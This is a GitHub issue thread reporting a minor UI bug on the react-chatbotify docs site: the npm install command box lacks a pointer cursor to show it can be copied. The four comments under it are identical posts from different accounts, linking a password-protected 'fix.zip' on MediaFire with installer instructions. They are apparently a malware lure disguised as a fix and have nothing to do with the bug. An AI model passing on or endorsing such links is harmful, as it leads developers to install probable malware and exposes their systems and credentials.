### ISSUE TITLE
[Bug] npm install command hover doesnt reflects the purpose clearly

### ISSUE THREAD

**Issue by vansh-codes** [tjtanjin/react-chatbotify-docs#3]
**Bug Description**
Provide a clear and concise description of the bug.

- When user hovers over the `npm install react-chatbotify --save` command, the cursor hover doesnt reflects the purpose and it become difficult for users to understand how to copy the text
It would be great if it has a cursor pointer!

**Steps To Reproduce**
Steps to reproduce the bug behavior:
1. Go to [website](https://react-chatbotify.com/)
2. Hover on 'install command'
3. Get confused on how to copy

**Expected behavior**
Describe the behavior that is expected to happen.
Cursor style to be pointer for user to understand that its clickable and hence can be copied clicking anywhere on the command box

**Screenshots**
![image](https://github.com/user-attachments/assets/dca6e2bb-2f83-4d63-9e0c-113103e7382b)

**Desktop (please complete the following information):**
 - OS: [e.g. iOS] All
 - Browser: [e.g. chrome, safari] All

**Mobile (please complete the following information):**
 - Device: [e.g. iPhone12] All
 - OS: [e.g. iOS8.1] All
 - Browser: [e.g. edge, firefox] All

**Additional context**

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
